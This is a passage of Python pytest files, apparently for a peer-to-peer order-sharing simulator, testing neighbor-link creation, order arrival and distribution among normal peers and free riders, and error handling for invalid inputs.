for any_peer in peer_list[0:NUM_FULLY_CONNECTED_PEERS]:
assert (
any_peer not in peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping
)
@pytest.mark.parametrize(
"scenario, engine, performance",
[(SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE)],
)
def test_add_new_links_helper__all_to_add(
scenario: Scenario, engine: Engine, performance: Performance
) -> None:
"""
This function tests add_new_links_helper() where the number of possible neighbors to add is
4, and the minimum requirement is also 4. So all possibilities are tried and added.
"""
# Arrange
# Create the single_run instance and peers
single_run_instance, peer_list = create_single_run_instance_and_peers(
scenario, engine, performance
)
# Act.
# Now, let peer_list[7] try to add 4 neighbors, and at least 4.
neighbor_size = 4
single_run_instance.add_new_links_helper(
peer_list[NUM_FULLY_CONNECTED_PEERS], neighbor_size, neighbor_size
)
# Assert.
assert (
len(peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping) == neighbor_size
)
for any_peer in peer_list[0:NUM_FULLY_CONNECTED_PEERS]:
assert (
any_peer not in peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping
)
for any_peer in peer_list[NUM_FULLY_CONNECTED_PEERS + 1 :]:
assert any_peer in peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping
@pytest.mark.parametrize(
"scenario, engine, performance",
[(SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE)],
)
def test_add_new_links_helper__tried_the_best(
scenario: Scenario, engine: Engine, performance: Performance
) -> None:
"""
This function tests add_new_links_helper() where the number of possible neighbors to add is
4, and the minimum requirement is 6 (and tries at 8 maximal). So all possibilities are tried
and added, and the process ends, although the added number does not reach 6.
"""
# Arrange
# Create the single_run instance and peers
single_run_instance, peer_list = create_single_run_instance_and_peers(
scenario, engine, performance
)
# Act.
# Now, let peer_list[7] try to add 8 neighbors, and at least 6.
min_neighbor = 6
max_neighbor = 8
single_run_instance.add_new_links_helper(
peer_list[NUM_FULLY_CONNECTED_PEERS], max_neighbor, min_neighbor
)
# Assert.
assert (
len(peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping)
== TOTAL_NUM_OF_PEERS - NUM_FULLY_CONNECTED_PEERS - 1
)
for peer in peer_list[0:NUM_FULLY_CONNECTED_PEERS]:
assert peer not in peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping
for peer in peer_list[NUM_FULLY_CONNECTED_PEERS + 1 :]:
assert peer in peer_list[NUM_FULLY_CONNECTED_PEERS].peer_neighbor_mapping
@pytest.mark.parametrize(
"scenario, engine, performance",
[(SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE)],
)
def test_add_new_links_helper__error_input(
scenario: Scenario, engine: Engine, performance: Performance
) -> None:
"""
This function tests add_new_links_helper() where input values are wrong.
"""
# Arrange
# Create the single_run instance and peers
single_run_instance, peer_list = create_single_run_instance_and_peers(
scenario, engine, performance
)
# Act and Assert.
with pytest.raises(ValueError, match="Input value is invalid."):
single_run_instance.add_new_links_helper(peer_list[7], 4, 6)
with pytest.raises(ValueError, match="Input value is invalid."):
single_run_instance.add_new_links_helper(peer_list[7], 0, 0)
with pytest.raises(ValueError, match="Input value is invalid."):
single_run_instance.add_new_links_helper(peer_list[7], 6, -1)
```
#### File: test/single_and_multi_run/test_group_of_orders_arrival_helper.py
```python
import random
import pytest
from single_run import SingleRun
from engine import Engine
from performance import Performance
from scenario import Scenario
from ..__init__ import SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE
from .__init__ import mock_random_choice, fake_gauss
NUM_ORDERS_TO_ARRIVE = 240
@pytest.mark.parametrize(
"scenario, engine, performance, num_arrival",
[(SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE, NUM_ORDERS_TO_ARRIVE)],
)
def test_group_of_orders_arrival_helper(
scenario: Scenario,
engine: Engine,
performance: Performance,
num_arrival: int,
monkeypatch,
) -> None:
"""
This tests group_of_orders_arrival_helper().
We test if the group of orders are properly created.
"""
# pylint: disable=too-many-locals
# This test function is a bit long but still fine.
# Arrange.
# Mock/fake functions. Similar to test_group_of_peers_arrival_helper.py.
monkeypatch.setattr(random, "choices", mock_random_choice)
monkeypatch.setattr(random, "gauss", fake_gauss)
# create the instance and 10 normal peers and 5 free rider.
total_num_normal_peers = 20
total_num_free_riders = 5
single_run_instance = SingleRun(scenario, engine, performance)
for _ in range(total_num_normal_peers):
single_run_instance.peer_arrival("normal", {})
for _ in range(total_num_free_riders):
single_run_instance.peer_arrival("free_rider", {})
normal_peer_list = list(single_run_instance.peer_type_set_mapping["normal"])
free_rider_list = list(single_run_instance.peer_type_set_mapping["free_rider"])
single_run_instance.order_full_set.clear()
# Act.
single_run_instance.group_of_orders_arrival_helper(num_arrival)
# Assert.
assert len(single_run_instance.order_full_set) == num_arrival
# First of all, calculate the expected number of orders that each peer will get. This is
# non-trivial and it follows the logic in mock_random_choice().
for idx in range(total_num_normal_peers):
assert (
len(normal_peer_list[idx].order_pending_orderinfo_mapping)
== NUM_ORDERS_TO_ARRIVE / total_num_normal_peers
)
num_default_order = sum(
1
for order in normal_peer_list[idx].order_pending_orderinfo_mapping
if order.order_type == "default"
)
sum_of_weights = sum(
value.mean
for value in scenario.peer_type_property[
"normal"
].initial_orderbook_size_dict.values()
)
assert (
num_default_order
== len(normal_peer_list[idx].order_pending_orderinfo_mapping)
* scenario.peer_type_property["normal"]
.initial_orderbook_size_dict["default"]
.mean
/ sum_of_weights
)
num_nft = sum(
1
for order in normal_peer_list[idx].order_pending_orderinfo_mapping
if order.order_type == "nft"
)
assert (
num_nft
== len(normal_peer_list[idx].order_pending_orderinfo_mapping)
* scenario.peer_type_property["normal"]
.initial_orderbook_size_dict["nft"]
.mean
/ sum_of_weights
)
# Assert free riders.
for peer in free_rider_list:
assert not peer.order_pending_orderinfo_mapping
# Assert the order sequence number update
assert single_run_instance.latest_order_seq == num_arrival
```
#### File: test/single_and_multi_run/test_order_arrival.py
```python
import pytest
from scenario import Scenario
from engine import Engine
from performance import Performance
from node import Peer
from data_types import ConcaveParameters, RandomParameter
from single_run import SingleRun
from ..__init__ import (
SCENARIO_SAMPLE,
ENGINE_SAMPLE,
create_a_test_peer,
PERFORMANCE_SAMPLE,
)
@pytest.mark.parametrize(
"scenario, engine, performance",
[(SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE)],
)
def test_order_arrival__normal(
scenario: Scenario, engine: Engine, performance: Performance
) -> None:
"""
This tests order_arrival() in normal case.
"""
# Arrange.
# create the single_run instance and a peer.
single_run_instance = SingleRun(scenario, engine, performance)
single_run_instance.peer_arrival("normal", {})
peer: Peer = next(iter(single_run_instance.peer_full_set))
peer.order_pending_orderinfo_mapping.clear()
# Preparing parameters
expiration_value = 300
settlement = ConcaveParameters(
method="ConcaveParameters", sensitivity=1.0, max_prob=0.0
)
cancellation = RandomParameter(method="RandomParameter", prob=0.0)
# Act.
single_run_instance.order_arrival(
target_peer=peer,
order_type="default",
expiration=expiration_value,
settlement=settlement,
cancellation=cancellation,
)
single_run_instance.order_arrival(
target_peer=peer,
order_type="nft",
expiration=expiration_value,
settlement=settlement,
cancellation=cancellation,
)
# Assert.
assert len(peer.order_pending_orderinfo_mapping) == 2
order_iterator = iter(peer.order_pending_orderinfo_mapping)
order_type_set = set()
for _ in range(2):
order = next(order_iterator)
order_type_set.add(order.order_type)
assert order.expiration == expiration_value
assert order in single_run_instance.order_full_set
assert "default" in order_type_set
assert "nft" in order_type_set
assert single_run_instance.latest_order_seq == 2
@pytest.mark.parametrize(
"scenario, engine, performance",
[(SCENARIO_SAMPLE, ENGINE_SAMPLE, PERFORMANCE_SAMPLE)],
)
def test_order_arrival__error(
scenario: Scenario, engine: Engine, performance: Performance
) -> None:
"""
This tests order_arrival() when the target peer does not exist.
"""
# Arrange.
# create the single_run instance and a peer.
single_run_instance = SingleRun(scenario, engine, performance)
peer: Peer = create_a_test_peer(scenario, engine)[0]
peer.order_pending_orderinfo_mapping.clear()
settlement = ConcaveParameters(
method="ConcaveParameters", sensitivity=1.0, max_prob=0.0
)
cancellation = RandomParameter(method="RandomParameter", prob=0.0)
# Act and Assert.
with pytest.raises(ValueError, match="Cannot find target peer."):
single_run_instance.order_arrival(
target_peer=peer,
order_type="default",
expiration=500,
settlement=settlement,
cancellation=cancellation,
)
``` |
Subsets and Splits